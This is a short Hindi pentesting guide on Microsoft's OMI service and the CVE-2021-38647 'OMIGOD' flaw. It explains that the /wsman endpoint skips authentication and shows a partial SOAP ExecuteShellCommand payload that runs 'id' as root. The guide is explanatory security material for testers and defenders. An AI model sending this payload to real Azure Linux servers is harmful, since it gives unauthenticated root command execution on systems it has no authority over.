5985,5986 - Pentesting OMI

Basic Information

OMI को Microsoft द्वारा एक open-source उपकरण के रूप में प्रस्तुत किया गया है, जो दूरस्थ कॉन्फ़िगरेशन प्रबंधन के लिए डिज़ाइन किया गया है। यह विशेष रूप से Azure पर Linux सर्वरों के लिए प्रासंगिक है जो निम्नलिखित सेवाओं का उपयोग करते हैं:

• Azure Automation

• Azure Automatic Update

• Azure Operations Management Suite

• Azure Log Analytics

• Azure Configuration Management

• Azure Diagnostics

जब ये सेवाएँ सक्रिय होती हैं, तो प्रक्रिया omiengine शुरू होती है और सभी इंटरफेस पर रूट के रूप में सुनती है।

डिफ़ॉल्ट पोर्ट जो उपयोग किए जाते हैं वे हैं 5985 (http) और 5986 (https)।

CVE-2021-38647 Vulnerability

16 सितंबर को देखे जाने के अनुसार, Azure में तैनात Linux सर्वर जिनमें उपरोक्त सेवाएँ हैं, एक कमजोर OMI संस्करण के कारण संवेदनशील हैं। यह संवेदनशीलता OMI सर्वर द्वारा /wsman एंडपॉइंट के माध्यम से संदेशों को संभालने में है, जो Authentication header की आवश्यकता नहीं करता, जिससे क्लाइंट को गलत तरीके से अधिकृत किया जाता है।

एक हमलावर इसको "ExecuteShellCommand" SOAP पेलोड भेजकर भुनाने में सक्षम है बिना Authentication header के, जिससे सर्वर को रूट विशेषाधिकार के साथ कमांड निष्पादित करने के लिए मजबूर किया जा सकता है।

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>

CVE के बारे में अधिक जानकारी के लिए यहाँ देखें।

संदर्भ

• https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/

• https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/